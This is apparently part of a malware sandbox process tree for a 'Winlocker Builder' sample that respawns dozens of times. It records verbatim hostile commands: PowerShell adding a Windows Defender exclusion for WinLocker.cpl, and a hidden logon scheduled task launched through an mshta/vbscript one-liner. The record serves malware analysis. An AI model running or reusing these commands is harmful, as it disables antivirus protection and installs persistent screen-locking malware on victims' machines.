        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        29⤵
        
        PID:3864
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        30⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4304
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        31⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1156
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        31⤵
        
        PID:2992
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        29⤵
        
        PID:4712
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        30⤵
        
        PID:4240
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        31⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:1824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:784
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        32⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2848
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        32⤵
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        30⤵
        
        PID:4948
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        31⤵
        
        PID:560
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        32⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:4272
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4920
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        33⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3572
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        33⤵
        
        PID:1284
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        31⤵
        
        PID:4868
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        32⤵
        
        PID:2868
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        33⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:3688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2900
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        34⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1400
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        34⤵
        
        PID:2788
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        32⤵
        
        PID:4536
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        33⤵
        
        PID:2024
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        34⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:4092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4240
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        35⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4088
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        35⤵
        
        PID:5100
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        33⤵
        
        PID:1108
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        34⤵
        
        PID:1868
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        35⤵
        Modifies visiblity of hidden/system files in Explorer
        
        PID:4832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        36⤵
        
        PID:4700
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        36⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:556
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        36⤵
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        34⤵
        
        PID:1932
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        35⤵
        
        PID:4488
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        36⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:8
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2336
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        37⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1612
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        37⤵
        
        PID:1592
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        35⤵
        Modifies registry class
        
        PID:2288
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        36⤵
        
        PID:2088
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        37⤵
        Modifies visiblity of hidden/system files in Explorer
        
        PID:5036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1016
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        38⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4564
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        38⤵
        
        PID:904
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        36⤵
        
        PID:1144
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        37⤵
        
        PID:784
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        38⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:4628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:232
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        39⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4948
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        39⤵
        
        PID:1676
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        37⤵
        Modifies registry class
        
        PID:3852
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        38⤵
        
        PID:3752
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        39⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:3100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2852
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        40⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3452
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        40⤵
        
        PID:3780
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        38⤵
        Modifies registry class
        
        PID:4920
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        39⤵
        
        PID:2444
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        40⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:1436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3196
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        41⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2476
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        41⤵
        
        PID:3700
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        39⤵
        
        PID:2788
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        40⤵
        
        PID:3156
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        41⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        42⤵
        
        PID:1904
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        42⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:920
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        42⤵
        
        PID:3260
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        40⤵
        
        PID:4992
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        41⤵
        
        PID:2472
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        42⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:4288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3864
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        43⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2912
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        43⤵
        
        PID:4688
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        41⤵
        
        PID:1004
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        42⤵
        
        PID:4920
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        43⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:2012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4480
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        44⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2288
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        44⤵
        
        PID:436
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        42⤵
        
        PID:1836
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        43⤵
        
        PID:3484
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        44⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:3388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1096
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        45⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1108
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        45⤵
        
        PID:4292
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        43⤵
        
        PID:2064
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        44⤵
        
        PID:1884
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        45⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:1692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        46⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:556
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        46⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3596
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        46⤵
        
        PID:2716
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        44⤵
        Modifies registry class
        
        PID:488
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        45⤵
        
        PID:3084
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        46⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:4672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1400
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        47⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2848
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        47⤵
        
        PID:3116
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        45⤵
        
        PID:4404
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        46⤵
        
        PID:4564
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        47⤵
        Modifies visiblity of hidden/system files in Explorer
        
        PID:2660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2904
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        48⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4556
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        48⤵
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        46⤵
        Modifies registry class
        
        PID:1956
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        47⤵
        
        PID:3260
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        48⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:1824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3032
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        49⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1892
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        49⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        47⤵
        
        PID:2036
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        48⤵
        
        PID:1940
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        49⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:8
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\System32\WinLocker.cpl"
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4036
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /F /TN "WinLocker" /SC ONLOGON /TR "mshta.exe vbscript:Execute(\"on error resume next:CreateObject(\"\"Wscript.Shell\"\").Run \"\"\"\"\"\"C:\Windows\System32\WinLocker.lnk\"\"\"\"\"\",0:close\"")"
        50⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1232
        
        C:\Windows\system32\SCHTASKS.exe
        
        SCHTASKS.exe /RUN /TN "WinLocker"
        50⤵
        
        PID:2484
        
        C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Winlocker Builder v0.6.exe"
        48⤵
        
        PID:3588
        
        C:\Windows\System32\control.exe
        
        "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        49⤵
        
        PID:2500
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\WinLocker.cpl",
        50⤵
        Modifies visiblity of hidden/system files in Explorer
        Drops file in System32 directory
        
        PID:3396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
